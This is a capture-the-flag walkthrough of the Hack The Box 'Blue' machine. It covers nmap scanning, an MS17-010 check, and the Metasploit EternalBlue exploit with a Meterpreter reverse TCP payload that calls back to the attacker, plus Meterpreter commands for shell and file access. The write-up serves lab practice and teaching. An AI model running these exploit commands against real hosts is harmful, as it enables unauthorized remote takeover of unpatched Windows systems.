Hack The Box : Blue

mach1982
4 min read, Oct 2, 2020

Phase 1: Recon

  • IP Address: 10.10.10.40
  • Host Name: Blue

Phase 2: Scanning

Nmap

nmap -A -T4 10.10.10.40

Using the “-A” parameter enables OS detection, version detection, default NSE script scanning and traceroute, while “-T4” selects a faster timing template. Note that the “Not shown: 65526 closed ports” line below means all 65535 TCP ports were scanned; nmap only covers the 1000 most common ports by default, so that output needs -p- added to the command shown.

Nmap scan report for 10.10.10.40
Host is up (0.075s latency).
Not shown: 65526 closed ports
microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/8%OT=135%CT=1%CU=43810%PV=Y%DS=2%DC=T%G=Y%TM=5EB5D73
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=FE%TI=I%CI=I%II=I%SS=S%TS=7)
OS:OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54D
OS:NW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
OS:ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=
OS:A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -18m05s, deviation: 34m36s, median: 1m52s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-05-08T23:05:29+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-08T22:05:28
|_ start_date: 2020-05-08T22:02:01
TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 75.10 ms 10.10.14.1
2 75.33 ms 10.10.10.40

Findings:

  • OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1), an SMBv1-era host
  • Computer Name: haris-PC (which hints at a local user named haris)
  • Open Ports: 445/tcp microsoft-ds (SMB, the port the smb-* host scripts ran against) and 49152-49157/tcp Microsoft Windows RPC
  • smb-security-mode: SMB1 message signing disabled and guest access accepted; smb2-security-mode: signing enabled but not required

A Windows 7 SP1 host exposing SMB with no sign of patching is the textbook target for MS17-010 (EternalBlue), which is what the next phase checks.

Phase 3: Exploitation

As with most things, Google is your friend: searching for vulnerabilities in an unpatched Windows 7 SP1 host with SMB exposed leads straight to MS17-010 (EternalBlue).

Using the search function of Metasploit for ms17_010 returns an auxiliary scanner alongside the exploit module.

To check and make sure the host is actually vulnerable before launching the exploit, we can use the auxiliary scanner module:

auxiliary/scanner/smb/smb_ms17_010

msf5 > use auxiliary/scanner/smb/smb_ms17_010

Using show options we see we only need the rhost

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.10.10.40
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! -
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
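The scanner's "likely VULNERABLE" verdict rests on a single NT status code. After an anonymous SMBv1 session and a tree connect to IPC$, the module sends an SMB_COM_TRANSACTION request carrying a PeekNamedPipe subcommand against FID 0; an unpatched srv.sys answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205), while a patched host rejects the bogus handle with STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED. The Python below is an added example, not code from this post or from Metasploit: it parses the SMB1 header of such a reply and applies that classification. The request side of the probe (negotiate, null session setup, tree connect, the Trans request) is not implemented here, and the sample replies it classifies are constructed inside the block so it runs offline.

```python
import struct

# NT status values from MS-ERREF. The MS17-010 check sends, over a null SMBv1
# session with a tree connect to IPC$, an SMB_COM_TRANSACTION request carrying
# the TRANS_PEEK_NMPIPE subcommand with FID 0. An unpatched srv.sys answers
# STATUS_INSUFF_SERVER_RESOURCES; a patched host rejects the bogus handle.
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205
STATUS_INVALID_HANDLE = 0xC0000008
STATUS_ACCESS_DENIED = 0xC0000022
SMB_COM_TRANSACTION = 0x25

SMB1_MAGIC = b"\xffSMB"
# SMB1 header (32 bytes, little-endian) that follows the 4-byte NetBIOS session
# header: magic, command, NT status, flags, flags2, PID high, signature,
# reserved, TID, PID, UID, MID.
SMB1_HEADER = struct.Struct("<4sBIBHH8sHHHHH")


def parse_smb1(packet: bytes) -> dict:
    """Split a NetBIOS-framed SMB1 message into its header fields and body."""
    if len(packet) < 4 + SMB1_HEADER.size:
        raise ValueError("packet too short for a NetBIOS + SMB1 header")
    nb_type = packet[0]
    nb_length = int.from_bytes(packet[1:4], "big")
    if nb_type != 0x00:  # 0x00 = session message; anything else is not SMB data
        raise ValueError(f"unexpected NetBIOS message type {nb_type:#04x}")
    if nb_length != len(packet) - 4:
        raise ValueError("NetBIOS length field does not match payload")
    (magic, command, status, flags, flags2, pid_high, _signature, _reserved,
     tid, pid, uid, mid) = SMB1_HEADER.unpack_from(packet, 4)
    if magic != SMB1_MAGIC:
        raise ValueError("not an SMB1 message")
    return {
        "command": command,
        "status": status,
        "flags": flags,
        "flags2": flags2,
        "pid": (pid_high << 16) | pid,
        "tid": tid,
        "uid": uid,
        "mid": mid,
        "body": packet[4 + SMB1_HEADER.size:],
    }


def ms17_010_verdict(packet: bytes) -> str:
    """Classify the server's reply to the Trans/PeekNamedPipe probe."""
    header = parse_smb1(packet)
    if header["command"] != SMB_COM_TRANSACTION:
        return "unknown: reply is not to the Trans probe"
    status = header["status"]
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "likely VULNERABLE to MS17-010"
    if status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "does NOT appear vulnerable"
    return f"unknown: NT status {status:#010x}"


def build_smb1_reply(command: int, status: int, body: bytes = b"\x00\x00\x00") -> bytes:
    """Constructed sample reply for offline testing (not a captured packet).

    The default body is an empty error response: WordCount 0, ByteCount 0.
    """
    flags = 0x98      # SMB_FLAGS_REPLY | canonical paths | case-insensitive
    flags2 = 0xC807   # Unicode, NT status codes, extended security, long names
    header = SMB1_HEADER.pack(SMB1_MAGIC, command, status, flags, flags2,
                              0, b"\x00" * 8, 0, 0x0800, 0xFEFF, 0x0800, 0x0041)
    payload = header + body
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


if __name__ == "__main__":
    for label, status in (("unpatched", STATUS_INSUFF_SERVER_RESOURCES),
                          ("patched", STATUS_INVALID_HANDLE)):
        reply = build_smb1_reply(SMB_COM_TRANSACTION, status)
        print(f"{label}: {ms17_010_verdict(reply)}")
```

Nmap's smb-vuln-ms17-010 NSE script applies the same status-code test, so it is a Metasploit-free way of running this check against a live host. Either way the probe is read-only: it never triggers the overflow, which is why it is safe to run before committing to the exploit.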

We will use exploit/windows/smb/ms17_010_eternalblue

msf5 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

(note: this exploit defaults to a Meterpreter reverse TCP payload, so the target will connect back to us)

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

lhost: the attacker machine's IP address, which the reverse payload connects back to

(note: as we are tunnelling over OpenVPN, our network interface is named tun0, and Metasploit accepts an interface name in place of the IP address, so we can use that instead of typing the attacker IP)

rhost: the remote host, i.e. the victim's IP address

(note: you can also use run instead of exploit)

Phase 4: Gaining Access/Maintaining access

The exploit hands us a Meterpreter session. Typing help lists all the commands available; some useful ones are:

cd       - Change directory
download - Download a file or directory
upload   - Upload a file or directory
getuid   - Get the user that the server is running as
sysinfo  - Gets information about the remote system, such as OS
shell    - Drop into a system command shell

(note: the Meterpreter payload runs in memory and never writes an executable to disk, which keeps it out of reach of file-based antivirus. It is not invisible, though: the EternalBlue exploit itself is noisy on the wire and widely signatured by network IDS, and a failed attempt can crash the target.)

From our nmap scan we know the computer name is haris-PC.

Using cd to change directory, we can see in C:\Users that there is a user called haris.

The flags are stored on the Desktop, so cd into C:\Users\haris\Desktop for the user flag, then repeat the same with C:\Users\Administrator\Desktop for the root flag. EternalBlue is a kernel exploit, so the session already runs as SYSTEM (getuid confirms this) and no privilege escalation step is needed to read either flag.

Phase 5: Covering tracks

Exit the session when done. Note that this only tears down the Meterpreter connection; it does not remove the traces the attack left behind, such as the exploit's network traffic or Windows event log entries.

meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.10.10.40 - Meterpreter session 2 closed. Reason: User exit
msf5 exploit(windows/smb/ms17_010_eternalblue) >
